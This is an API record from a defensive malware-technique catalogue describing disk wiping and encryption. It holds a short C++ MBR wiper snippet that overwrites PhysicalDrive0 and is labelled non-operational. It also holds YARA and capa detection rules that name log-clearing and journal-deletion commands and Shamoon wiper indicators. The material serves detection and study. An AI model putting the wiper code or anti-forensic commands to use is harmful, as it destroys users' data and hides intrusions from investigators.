GET /api/techniques/134/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "Wiping or Encrypting",
    "category": [
        "https://search.unprotect.it/api/categories/8/"
    ],
    "description": "Malware can use wiping or encryption techniques to remove its traces from the system. It can also use this technique as a decoy, or for sabotage operations.",
    "resources": "https://securingtomorrow.mcafee.com/business/pseudo-ransomware-killdisk-creates-smoke-screen-cybercriminals/",
    "tags": "wiping, encryption",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/134/",
            "description": "Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.",
            "plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\n#define MBR_SIZE 512\r\n\r\nusing namespace std;\r\n\r\nint WipeMBR(void) {\r\n    char dmbr[MBR_SIZE];\r\n\r\n    ZeroMemory(&dmbr, sizeof(dmbr));\r\n    HANDLE disk = CreateFile((LPCSTR)\"\\\\\\\\.\\\\PhysicalDrive0\", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);\r\n    CloseHandle(disk);\r\n    return 0;\r\n}\r\n\r\nint main() {\r\n    cout << \"Start Wiping\" << endl;\r\n    WipeMBR();\r\n    return 0;\r\n}"
        }
    ],
    "detection_rules": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_wiping_event",
            "rule": "rule UNPROTECT_wiping_event\r\n{\r\n    meta:\r\n        description = \"Rule to detect wiping events logs\"\r\n        author = \"McAfee ATR team | Thomas Roccia\"\r\n        date = \"2020-11-10\"\r\n        rule_version = \"v1\"\r\n        mitre = \"T1070\"\r\n        hash = \"c063c86931c662c1a962d08915d9f3a8\"\r\n\r\n    strings:\r\n        $s1 = \"wevtutil.exe\" ascii wide nocase\r\n        $s2 = \"cl Application\" ascii wide nocase\r\n        $s3 = \"cl System\" ascii wide nocase\r\n        $s4 = \"cl Setup\" ascii wide nocase\r\n        $s5 = \"cl Security\" ascii wide nocase\r\n        $s6 = \"sl Security /e:false\" ascii wide nocase\r\n        $s7= \"usn deletejournal /D\" ascii wide nocase\r\n\r\n    condition:\r\n        uint16(0) == 0x5a4d and 4 of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Shamoon_Wiper",
            "rule": "import \"pe\"\r\n\r\nrule Shamoon2_Wiper {\r\n   meta:\r\n      description = \"Detects Shamoon 2.0 Wiper Component\"\r\n      author = \"Florian Roth\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 70\r\n      hash1 = \"c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a\"\r\n      hash2 = \"128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd\"\r\n   strings:\r\n      $a1 = \"\\\\??\\\\%s\\\\System32\\\\%s.exe\" fullword wide\r\n      $x1 = \"IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB\" wide\r\n      $s1 = \"UFWYNYNTS\" fullword wide\r\n      $s2 = \"\\\\\\\\?\\\\ElRawDisk\" fullword wide\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )\r\n}\r\n\r\nrule EldoS_RawDisk {\r\n   meta:\r\n      description = \"EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)\"\r\n      author = \"Florian Roth (with Binar.ly)\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 50\r\n      hash1 = \"47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34\"\r\n      hash2 = \"394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b\"\r\n   strings:\r\n      $s1 = \"g\\\\system32\\\\\" fullword wide\r\n      $s2 = \"ztvttw\" fullword wide\r\n      $s3 = \"lwizvm\" fullword ascii\r\n      $s4 = \"FEJIKC\" fullword ascii\r\n      $s5 = \"INZQND\" fullword ascii\r\n      $s6 = \"IUTLOM\" fullword wide\r\n      $s7 = \"DKFKCK\" fullword ascii\r\n\r\n      $op1 = { 94 35 77 73 03 40 eb e9 }\r\n      $op2 = { 80 7c 41 01 00 74 0a 3d }\r\n      $op3 = { 74 0a 3d 00 94 35 77 }\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "clear_log",
            "rule": "rule:\r\n  meta:\r\n    name: clear the Windows event log\r\n    namespace: anti-analysis/anti-forensic/clear-logs\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - api: advapi32.ElfClearEventLogFile\r\n      - optional:\r\n        - api: advapi32.OpenEventLog"
        }
    ]
}